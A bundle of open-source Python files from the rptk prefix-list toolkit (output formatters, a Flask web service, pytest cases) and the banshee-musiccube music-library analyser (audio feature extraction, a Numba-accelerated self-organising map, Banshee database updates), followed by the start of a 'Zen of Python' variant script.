self.log.debug(msg="{} instance initialised".format(self.cls_name))
def log_method_enter(self, method=None):
"""Log entry into a class method."""
self.log.debug(msg="entering method {}.{}"
.format(self.cls_name, method))
def log_method_exit(self, method=None):
"""Log exit from a class method."""
self.log.debug(msg="leaving method {}.{}"
.format(self.cls_name, method))
def log_ready_start(self):
"""Log start of object initialisation."""
self.log.debug(msg="preparing {} for use".format(self))
def log_ready_done(self):
"""Log end of object initialisation."""
self.log.debug(msg="{} ready for use".format(self))
def log_exit_start(self):
"""Log start of object cleanup."""
self.log.debug(msg="cleaning up {}".format(self))
def log_exit_done(self):
"""Log end of object cleanup."""
self.log.debug(msg="finished cleaning up {}".format(self))
def raise_type_error(self, arg=None, cls=None):
"""Raise a TypeError with useful logging."""
msg = "argument {} ({}) not of type {}".format(arg.__name__, arg, cls)
self.log.error(msg=msg)
raise TypeError(msg)
def raise_runtime_error(self, msg=None):
"""Raise a RuntimeError with useful logging."""
self.log.error(msg=msg)
raise RuntimeError(msg)
|
wolcomm/rptk
|
rptk/format/__init__.py
|
<gh_stars>10-100
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk module.format module."""
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import jinja2
from rptk.base import BaseObject
try:
basestring
except NameError:
basestring = str
try:
unicode
except NameError:
unicode = str
class BaseFormat(BaseObject):
"""Base class for the definition of output format classes."""
description = None
content_type = "text/plain"
def __init__(self, **opts):
"""Initialise new object."""
super(BaseFormat, self).__init__()
self.log_init()
self._opts = opts
self.log_init_done()
def format(self, result=None):
"""Check the result type and name."""
self.log_method_enter(method=self.current_method)
if not isinstance(result, dict):
self.raise_type_error(arg=result, cls=dict)
self.log_method_exit(method=self.current_method)
class JinjaFormat(BaseFormat):
"""Base class for Jinja2 template-based output format classes."""
template_name = None
def __init__(self, **opts):
"""Initialise new object."""
super(JinjaFormat, self).__init__(**opts)
self.log.debug("configuring jinja2 environment")
try:
self.env = jinja2.Environment(
loader=jinja2.PackageLoader('rptk')
)
self.env.trim_blocks = True
self.env.lstrip_blocks = True
except Exception as e:
self.log.error(msg="{}".format(e))
raise e
self._template = None
self.log_init_done()
def __enter__(self):
"""Load Jinja2 template."""
self.log_ready_start()
self._load_template()
self.log_ready_done()
return self
@property
def template(self):
"""Get loaded Jinja2 template object."""
return self._template
def _load_template(self):
"""Load template into Jinja2 Environment instance."""
try:
self._template = self.env.get_template(self.template_name)
except jinja2.TemplateError as e:
self.log.error(msg="{}".format(e))
raise e
self.log.debug("template loaded successfully")
def format(self, result=None):
"""Render output from template."""
self.log_method_enter(method=self.current_method)
super(JinjaFormat, self).format(result=result)
if isinstance(self.template, jinja2.Template):
try:
output = self.template.render(results=result,
now=datetime.datetime.now())
except Exception as e:
self.log.error(msg="{}".format(e))
raise e
else:
self.raise_type_error(arg=self.template, cls=jinja2.Template)
self.log_method_exit(method=self.current_method)
return output
|
wolcomm/rptk
|
test/helpers.py
|
<gh_stars>10-100
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Helper functions and constants for rptk test cases."""
from __future__ import print_function
from __future__ import unicode_literals
import os
from rptk import RptkAPI
def objects():
"""Return tuples of RPSL objects to test against."""
return (("AS37271",), ("AS37271:AS-CUSTOMERS",),
("AS37271", "AS37271:AS-CUSTOMERS"))
def default_query_classes():
"""Return the dict of default query classes to test with."""
return RptkAPI.default_query_classes
def default_format_classes():
"""Return the dict of default format classes to test with."""
return RptkAPI.default_format_classes
def available_policies():
"""Return the dict of available resolution policies to test with."""
return RptkAPI.available_policies
def test_config_file():
"""Return the path to the testing config file."""
return os.path.join(os.path.dirname(__file__), "test.conf")
|
wolcomm/rptk
|
rptk/format/yamlf.py
|
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk module.format.yamlf module."""
from __future__ import print_function
from __future__ import unicode_literals
import logging
from rptk.format import BaseFormat
import yaml
try:
from yaml import CDumper as Dumper
except ImportError as e: # pragma: no cover
logging.getLogger(__name__).warning("%s: falling back to python dumper", e)
from yaml import Dumper
class YamlFormat(BaseFormat):
"""Renders result object as a YAML document."""
description = "YAML object representation"
content_type = "application/x-yaml"
def format(self, result=None):
"""Render output as YAML."""
self.log_method_enter(method=self.current_method)
super(self.__class__, self).format(result=result)
self.log.debug(msg="creating json output")
try:
output = yaml.dump(result, Dumper=Dumper, indent=4,
explicit_start=True, explicit_end=True,
default_flow_style=False)
except Exception as e:
self.log.error(msg="{}".format(e))
raise e
self.log_method_exit(method=self.current_method)
return output
|
wolcomm/rptk
|
rptk/format/ios_null.py
|
<filename>rptk/format/ios_null.py
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk module.format.ios_null module."""
from __future__ import print_function
from __future__ import unicode_literals
from rptk.format import JinjaFormat
class IosNullFormat(JinjaFormat):
"""Renders result object a Cisco IOS prefix-list with explicit deny all."""
description = "Cisco IOS Classic / XE null prefix-list"
template_name = 'ios_null.j2'
|
wolcomm/rptk
|
rptk/web.py
|
<reponame>wolcomm/rptk
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk web module."""
from __future__ import print_function
from __future__ import unicode_literals
import json
import logging
import flask
from rptk import RptkAPI
app = flask.Flask(__name__)
@app.route("/formats")
def get_formats():
"""Return json doc describing the available output formats."""
rptk = RptkAPI()
formats = rptk.format_class_loader.class_info
response = flask.make_response(json.dumps(formats))
response.headers['Content-Type'] = "application/json"
response.headers['Server'] = "rptk-web/{}".format(rptk.version)
return response
@app.route("/policies")
def get_policies():
"""Return json doc listing the available resolution policies."""
rptk = RptkAPI()
policies = rptk.available_policies
response = flask.make_response(json.dumps(policies))
response.headers['Content-Type'] = "application/json"
response.headers['Server'] = "rptk-web/{}".format(rptk.version)
return response
@app.route("/query")
@app.route("/<string:format>/query")
@app.route("/<string:format>/<string:obj>")
@app.route("/<string:format>/<string:obj>/<string:policy>")
def get_prefix_list(format=None, obj=None, policy=None):
"""Return prefix-lists for the requested object."""
app.logger.debug(msg="got args: {}".format(flask.request.args))
objects = flask.request.args.getlist("objects")
if obj:
objects.append(obj)
objects = set(objects)
if not format:
format = flask.request.args.get("format")
if not policy:
policy = flask.request.args.get("policy")
rptk = RptkAPI(query_policy=policy, format_class_name=format)
result = rptk.query(*objects)
output = rptk.format(result=result)
response = flask.make_response(output)
response.headers['Content-Type'] = rptk.format_class.content_type
response.headers['Server'] = "rptk-web/{}".format(rptk.version)
return response
def main(): # pragma: no cover
"""Run the development server."""
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--debug", action="store_true", default=False,
help="enable debug mode")
args = parser.parse_args()
logger = logging.getLogger()
for h in app.logger.handlers:
logger.addHandler(h)
if args.debug:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.WARNING)
app.run(host='::', port=8080, debug=args.debug)
if __name__ == "__main__":
main()
|
wolcomm/rptk
|
test/test_formats.py
|
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk format class test cases."""
from __future__ import print_function
from __future__ import unicode_literals
import importlib
import json
import logging
import os
from helpers import default_format_classes, objects
import pytest
import yaml
try:
from yaml import CLoader as Loader
except ImportError as e:
logging.getLogger(__name__).warning("%s", e, exc_info=True)
from yaml import Loader
class TestFormatClass(object):
"""Test cases for rptk format classes."""
data_dir = os.path.join(os.path.dirname(__file__), "data")
@pytest.mark.parametrize(("format", "path"),
default_format_classes().items())
@pytest.mark.parametrize("objects", objects())
def test_format_class(self, format, path, objects, validate_schema):
"""Test rptk format class."""
mod_path, cls_name = path.rsplit(".", 1)
mod = importlib.import_module(mod_path)
cls = getattr(mod, cls_name)
result = dict()
for obj in objects:
with open(os.path.join(self.data_dir, "{}.json".format(obj))) as f:
result.update(json.load(f))
with cls() as f:
output = f.format(result=result)
if format == "json":
assert validate_schema(json.loads(output),
"get_prefix_list.schema")
elif format == "yaml":
assert validate_schema(yaml.load(output, Loader=Loader),
"get_prefix_list.schema")
else:
for obj in objects:
assert obj in output
|
wolcomm/rptk
|
test/test_api.py
|
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk API test cases."""
from __future__ import print_function
from __future__ import unicode_literals
from helpers import (available_policies, default_format_classes,
default_query_classes, objects, test_config_file)
import pytest
config_file_opts = (None, test_config_file())
@pytest.mark.usefixtures("mock_query_classes")
class TestAPI(object):
"""Test cases for rptk python API."""
@pytest.mark.parametrize("config_file", config_file_opts)
@pytest.mark.parametrize("q", default_query_classes().keys())
@pytest.mark.parametrize("f", default_format_classes().keys())
@pytest.mark.parametrize("p", available_policies().keys())
@pytest.mark.parametrize("objects", objects())
def test_api(self, config_file, q, f, p, objects):
"""Test rptk python API."""
from rptk import RptkAPI
with RptkAPI(config_file=config_file, query_class_name=q,
format_class_name=f, query_policy=p) as api:
result = api.query(*objects)
output = api.format(result=result)
assert output
|
wolcomm/rptk
|
rptk/__meta__.py
|
#!/usr/bin/env python
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk package metadata."""
from __future__ import print_function
from __future__ import unicode_literals
__version__ = "0.2.1-dev.1"
__author__ = "Workonline Communications"
__author_email__ = "<EMAIL>"
__licence__ = "Apache License 2.0"
__copyright__ = "Copyright (c) 2018 Workonline Communications (Pty) Ltd"
__url__ = "https://github.com/wolcomm/rptk"
__classifiers__ = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
]
__entry_points__ = {
'console_scripts': [
'rptk=rptk.command_line:main',
'rptk-web=rptk.web:main'
]
}
if __name__ == "__main__":
print(__version__)
|
jerleo/banshee-musiccube
|
musiccube/analyzer.py
|
# Original code by:
# <NAME>: Mapping Your Music Collection
# http://www.christianpeccei.com/musicmap/
import numpy as np
import os
import struct
import wave
from shlex import split
from subprocess import call
from uuid import uuid4
class Analyzer:
FEATURES_LENGTH = 42
SECONDS_PER_SONG = 90
SAMPLING_RATE = 10000
def valid_features(self, data):
return len(data) == self.FEATURES_LENGTH
def moments(self, x):
mean = x.mean()
std = x.var() ** 0.5
skewness = ((x - mean) ** 3).mean() / std ** 3
kurtosis = ((x - mean) ** 4).mean() / std ** 4
return [mean, std, skewness, kurtosis]
def fftfeatures(self, wavdata):
f = np.fft.fft(wavdata)
f = f[2:(f.size / 2 + 1)]
f = abs(f)
total_power = f.sum()
f = np.array_split(f, 10)
return [e.sum() / total_power for e in f]
def features(self, data):
# convert to array
x = np.array(data)
# initialize result vector
feature_vec = np.zeros(self.FEATURES_LENGTH)
# smoothing window: 1 samples
x1 = x
d1 = x1[1:] - x1[:-1]
feature_vec[0:4] = self.moments(x1)
feature_vec[4:8] = self.moments(d1)
# smoothing window: 10 samples
x10 = x.reshape(-1, 10).mean(1)
d10 = x10[1:] - x10[:-1]
feature_vec[8:12] = self.moments(x10)
feature_vec[12:16] = self.moments(d10)
# smoothing window: 100 samples
x100 = x.reshape(-1, 100).mean(1)
d100 = x100[1:] - x100[:-1]
feature_vec[16:20] = self.moments(x100)
feature_vec[20:24] = self.moments(d100)
# smoothing window: 1000 samples
x1000 = x.reshape(-1, 1000).mean(1)
d1000 = x1000[1:] - x1000[:-1]
feature_vec[24:28] = self.moments(x1000)
feature_vec[28:32] = self.moments(d1000)
feature_vec[32:] = self.fftfeatures(data)
return feature_vec
def read_wav(self, wav_file):
song_data = wave.open(wav_file)
n = song_data.getnframes()
n = n - n % 1000
frames = song_data.readframes(n)
wav_data = struct.unpack('%dh' % n, frames)
return wav_data
def compute_features(self, mp3_file):
out_path = '/tmp/%s.wav' % uuid4()
cmd_args = 'avconv -v quiet -i "%s" -ac 1 -ar %s -t %s "%s"'
cmd_args = cmd_args % (mp3_file, self.SAMPLING_RATE,
self.SECONDS_PER_SONG, out_path)
ret_code = call(split(cmd_args))
assert(ret_code == 0)
sample_data = self.read_wav(out_path)
assert(len(sample_data) > 0)
os.remove(out_path)
return self.features(sample_data)
|
jerleo/banshee-musiccube
|
musiccube/musiccube.py
|
<gh_stars>0
#!/usr/bin/env python
#
# musiccube.py
#
# Copyright (C) 2015 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import numpy as np
import os
import shelve
from analyzer import Analyzer
from banshee import Banshee
from numbacube import NumbaCube
from progress import Progress
from matplotlib import pyplot, colors
from mpl_toolkits.mplot3d import Axes3D
from pylab import figure
class MusicCube:
# path and file name of music database
DB_PATH = ".musiccube"
DB_NAME = "musiccube.dbm"
def __init__(self):
Progress("Total Time", 1).display()
# get music path from Banshee
self.banshee = Banshee()
self.music_path = self.banshee.library_source()
# get full path of music database
db_path = os.path.join(self.music_path, self.DB_PATH)
db_file = os.path.join(db_path, self.DB_NAME)
# create path to music database
if not os.path.exists(db_path):
os.makedirs(db_path)
# get and update music data
self.music_shelve = shelve.open(db_file, writeback=True)
self.update_music_data()
# transform columns to be between 0 and 1
self.scale_music_data()
# calculate number of nodes per edge
cube_edge = int(len(self.music_data) ** (1 / 3.0))
# create or load music cube
self.numba_cube = NumbaCube(
edge_length=cube_edge,
node_weights=Analyzer.FEATURES_LENGTH,
npy_path=db_path,
random_seed=1)
def __del__(self):
self.music_shelve.close()
def get_paths(self):
return self.music_shelve.keys()
def get_features(self, song):
# calculate scaled song features
song_data = np.array(self.music_shelve[song])
# normalize by column
song_data = self.scale_by_column(song_data)
return song_data
def get_position(self, song):
# return cube coordinates of song
song_features = self.get_features(song)
return self.numba_cube.get_position(song_features)
def update_music_data(self):
analyzer = Analyzer()
music_list = self.banshee.get_tracks()
# delete previously analyzed songs no longer existing in Banshee
for mp3 in self.music_shelve:
if mp3 not in music_list:
del self.music_shelve[mp3]
self.music_shelve.sync()
song_count = len(music_list)
progress = Progress("Analyzing Songs", song_count)
# calculate and save features of new songs
for mp3 in music_list:
if mp3 not in self.music_shelve:
features = analyzer.compute_features(mp3)
if analyzer.valid_features(features):
self.music_shelve[mp3] = features
self.music_shelve.sync()
progress.display()
# convert music data to array
self.music_data = np.array(self.music_shelve.values())
def update_banshee(self):
self.counter = {}
positions = {}
paths = self.get_paths()
song_count = len(paths)
progress = Progress("Updating Banshee", song_count)
for song in paths:
position = self.get_position(song)
positions[song] = position
# count song positions for plotting
if position not in self.counter:
self.counter[position] = 1
else:
self.counter[position] += 1
progress.display()
# update song positions in Banshee
self.banshee.update_tracks(positions)
def scale_music_data(self):
# scale music data column wise
mins = np.min(self.music_data, axis=0)
self.maxs = np.max(self.music_data, axis=0)
self.rng = self.maxs - mins
self.music_data = self.scale_by_column(self.music_data)
def scale_by_column(self, data, high=1.0, low=0.0):
return high - (((high - low) * (self.maxs - data)) / self.rng)
def train_numbacube(self):
self.numba_cube.train(self.music_data)
self.numba_cube.save()
def plot(self):
# create and show scatter plot
ax = Axes3D(figure())
# transform to array
data = np.array([(key[0], key[1], key[2], val)
for key, val in self.counter.items()])
# sort by position counter
data = data[np.argsort(data[:, 3])]
# minimum and maximum counter
min = np.min(data[:, 3])
max = np.max(data[:, 3])
# setup color mapping
colormap = pyplot.cm.ScalarMappable(
norm=colors.Normalize(vmin=min, vmax=max),
cmap=pyplot.cm.get_cmap('RdYlBu_r'))
# initialize loop
group = 0
loops = len(data)
for ix in range(loops):
# determine current group
count = data[ix][3]
# group header
if not count == group:
xs = []
ys = []
zs = []
# group body
xs.append(data[ix][0])
ys.append(data[ix][1])
zs.append(data[ix][2])
group = count
# group footer
# last item or last item of group
if (ix == loops - 1) or not (data[ix + 1][3] == group):
color = colormap.to_rgba(group)
size = 10 + group * 10
ax.scatter(xs, ys, zs, c=color, s=size)
ax.set_title("MusicCube")
pyplot.show()
if __name__ == '__main__':
music_cube = MusicCube()
music_cube.train_numbacube()
music_cube.update_banshee()
music_cube.plot()
print "Done."
|
jerleo/banshee-musiccube
|
musiccube/detector.py
|
<reponame>jerleo/banshee-musiccube
#!/usr/bin/env python
'''
Simple program that uses the 'bpmdetect' GStreamer plugin to detect
the BPM of a song, and outputs that to console.
Requires GStreamer 1.x, PyGObject 1.x, and gst-plugins-bad
Copyright (C) 2015 <NAME>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License version 2 as
published by the Free Software Foundation.
'''
import os
import shelve
import sys
import gi
gi.require_version('Gst', '1.0')
from gi.repository import Gst, GObject, Gio
from banshee import Banshee
class Detector:
def __message__(self, bus, msg):
if msg.type == Gst.MessageType.TAG:
tags = msg.parse_tag()
# Discard tags already set on the file
if tags.n_tags() > 1:
return
val = tags.get_value_index('beats-per-minute', 0)
try:
bpm = int(val)
except:
return
if bpm > 0:
self.bpm = bpm
elif msg.type == Gst.MessageType.ERROR:
self.playbin.set_state(Gst.State.NULL)
gerror, debug_info = msg.parse_error()
if gerror:
print gerror.message.rstrip(".")
else:
print debug_info
elif msg.type == Gst.MessageType.EOS:
self.playbin.set_state(Gst.State.NULL)
self.loop.quit()
def __init__(self, song):
Gst.init(None)
audio_sink = Gst.Bin.new('audio_sink')
# bpmdetect doesn't work properly with more than one channel,
# see https://bugzilla.gnome.org/show_bug.cgi?id=751457
cf = Gst.ElementFactory.make('capsfilter')
cf.props.caps = Gst.Caps.from_string('audio/x-raw,channels=1')
fakesink = Gst.ElementFactory.make('fakesink')
fakesink.props.sync = False
fakesink.props.signal_handoffs = False
bpmdetect = Gst.ElementFactory.make('bpmdetect')
audio_sink.add(cf)
audio_sink.add(bpmdetect)
audio_sink.add(fakesink)
cf.link(bpmdetect)
bpmdetect.link(fakesink)
audio_sink.add_pad(Gst.GhostPad.new('sink', cf.get_static_pad('sink')))
self.playbin = Gst.ElementFactory.make('playbin')
self.playbin.props.audio_sink = audio_sink
bus = self.playbin.get_bus()
bus.add_signal_watch()
bus.connect('message', self.__message__)
uri = Gio.File.new_for_commandline_arg(song).get_uri()
self.playbin.props.uri = uri
self.loop = GObject.MainLoop()
def get_bpm(self):
self.playbin.set_state(Gst.State.PLAYING)
self.loop.run()
return self.bpm
if __name__ == '__main__':
if len(sys.argv) == 2:
song = sys.argv[1]
bpm_detector = Detector(song)
print bpm_detector.get_bpm()
sys.exit(0)
banshee = Banshee()
db_path = banshee.library_source()
db_path = os.path.join(db_path, '.bpm.dbm')
bpm_list = shelve.open(db_path, writeback=True)
song_list = banshee.get_tracks()
for song in song_list:
if song not in bpm_list:
bpm_detector = Detector(song)
bpm_list[song] = bpm_detector.get_bpm()
uri = Gio.File.new_for_commandline_arg(song).get_uri()
bpm = bpm_list[song]
print 'UPDATE CoreTracks SET BPM = %d WHERE Uri = "%s";' % (bpm, uri)
|
jerleo/banshee-musiccube
|
musiccube/numbacube.py
|
<reponame>jerleo/banshee-musiccube<filename>musiccube/numbacube.py<gh_stars>0
# Original code by:
# <NAME>: A Kohonen Map in Python (optimized by Numba)
# http://nbviewer.ipython.org/gist/alexbw/3407544
import numpy as np
import os
from numba import jit
from progress import Progress
class NumbaCube:
def __init__(self, edge_length, node_weights, npy_path=None, random_seed=None):
# Seed random generator
np.random.seed(random_seed)
self.edge_length = edge_length
self.nodes = edge_length ** 3
self.dims = node_weights
raw_grid = np.mgrid[0:edge_length, 0:edge_length, 0:edge_length]
self.indices = np.zeros((self.nodes, 3))
self.indices[:, 0] = raw_grid[0].ravel()
self.indices[:, 1] = raw_grid[1].ravel()
self.indices[:, 2] = raw_grid[2].ravel()
if not npy_path == None:
base_name = os.path.join(npy_path, "numbacube_%sx%sx%s" %
(edge_length, edge_length, edge_length))
self.weight_file = base_name + '.npy'
# Initialize the weights
if os.path.exists(self.weight_file):
self.weights = np.load(self.weight_file)
self.new = False
else:
self.weights = np.random.random((self.nodes, self.dims))
self.new = True
# Allocate the weight distances
self.distances = np.zeros((self.nodes,), dtype='d')
def get_position(self, sample):
winner = get_winner(sample, self.nodes, self.dims,
self.weights, self.distances)
x = int(self.indices[winner, 0])
y = int(self.indices[winner, 1])
z = int(self.indices[winner, 2])
return (x, y, z)
def save(self):
if not self.weight_file == None:
np.save(self.weight_file, self.weights)
return True
return False
def scale(self, start, end):
return np.double(start + self.progress * (end - start))
def train(self, data):
# Some initial logistics
samples, dims = data.shape
# Check shape
assert(dims == self.dims)
# Set parameters
rate_lower = 0.1
rate_upper = 0.5
spread_lower = 1.0
spread_upper = self.edge_length / 3.0
shuffled = range(samples)
np.random.shuffle(shuffled)
# Create progress object
progress = Progress("Training MusicCube", samples)
for ix in range(samples):
# Pick a random vector
sample = data[shuffled[ix], :]
# Figure out who's the closest weight vector
# and calculate distances between weights and the sample
winner = get_winner(sample, self.nodes, self.dims,
self.weights, self.distances)
# Calculate the new learning rate and new learning spread
self.progress = float(ix) / float(samples)
self.rate = self.scale(rate_upper, rate_lower)
self.spread = self.scale(spread_upper, spread_lower)
# Update those weights
update_weights(sample, winner,
self.nodes, self.dims,
self.rate, self.spread,
self.weights, self.indices)
# Display progress
progress.display()
@jit(nopython=True)
def get_winner(sample, nodes, dims, weights, distances):
for n in range(nodes):
distances[n] = 0.0
for d in range(dims):
distances[n] += (sample[d] - weights[n, d]) ** 2.0
distances[n] **= 0.5
return np.argmin(distances)
@jit(nopython=True)
def update_weights(sample, winner, nodes, dims, rate, spread, weights, indices):
x = indices[winner, 0]
y = indices[winner, 1]
z = indices[winner, 2]
for n in range(nodes):
distance = ((x - indices[n, 0]) ** 2.0) + \
((y - indices[n, 1]) ** 2.0) + \
((z - indices[n, 2]) ** 2.0)
distance **= 0.5
dampening = np.e ** (-distance / (2.0 * spread ** 2.0))
dampening *= rate
for d in range(dims):
weights[n, d] += dampening * (sample[d] - weights[n, d])
|
jerleo/banshee-musiccube
|
musiccube/banshee.py
|
<filename>musiccube/banshee.py
#
# banshee.py
#
# Copyright (C) 2015 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import os
import sqlite3
import urllib
import gi
gi.require_version('GConf', '2.0')
from gi.repository import GConf
class Banshee:
DB_PATH = ".config/banshee-1/banshee.db"
GCONF_KEY = "/apps/banshee-1/sources/_music_library_source_-_library/library-location"
class Connection:
def __init__(self, db_path):
self.db_path = db_path
def __enter__(self):
self.connection = sqlite3.connect(self.db_path) # PyDev: Forced built-in _sqlite3
return self.connection.cursor()
def __exit__(self, type, value, traceback): # @ReservedAssignment
self.connection.close()
return True
def __init__(self):
home = os.path.expanduser('~')
self.db_path = os.path.join(home, self.DB_PATH)
def library_source(self):
# client = gconf.client_get_default()
client = GConf.Client.get_default()
source = client.get_string(self.GCONF_KEY)
assert source, "GConf: %s not found" % self.GCONF_KEY
return source
def get_tracks(self):
result = {}
with self.Connection(self.db_path) as db:
db.execute("""SELECT Uri, TrackId
FROM CoreTracks
WHERE Uri LIKE 'file://%.mp3'
ORDER BY Uri""")
rows = db.fetchall()
for row in rows:
song = row[0].encode('ascii')
song = urllib.unquote(song)
song = song.replace("file://", "")
if os.path.exists(song):
result[song] = row[1]
return result
def create_table(self):
with self.Connection(self.db_path) as db:
db.executescript("""
DROP TABLE IF EXISTS MusicCube;
CREATE TABLE MusicCube (
TrackID INTEGER PRIMARY KEY,
Axis1 INTEGER,
Axis2 INTEGER,
Axis3 INTEGER );
""")
def update_tracks(self, song_positions):
self.create_table()
with self.Connection(self.db_path) as db:
banshee_songs = self.get_tracks()
for song in banshee_songs:
if song in song_positions:
track_id = banshee_songs[song]
grid = song_positions[song]
db.execute("INSERT INTO MusicCube VALUES( ?, ?, ?, ? )",
(track_id, grid[0], grid[1], grid[2]))
db.connection.commit()
|
jerleo/banshee-musiccube
|
musiccube/progress.py
|
#
# progress.py
#
# Copyright (C) 2015 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from os import linesep
from sys import stdout
class Progress:
STEPS = 50
TITLE = 25
def __init__(self, title, total):
self.total = total
self.count = 0
self.last = 0
self.width = float(total) / float(self.STEPS)
stdout.write(title.ljust(self.TITLE))
def display(self):
self.count += 1
curr = int(self.count / self.width)
dots = curr - self.last
for i in range(dots):
stdout.write(".")
if self.count == self.total:
stdout.write(linesep)
stdout.flush()
self.last = curr
|
csparpa/betterzen
|
betterzen.py
|
#!/usr/bin/env python
"""
A revised version of the Zen of Python
"""
from os import linesep as newline
from random import randrange
_header ="""
The Zen of Python, by <NAME>
"""
_aphorisms = [ "Beautiful is better than ugly.",
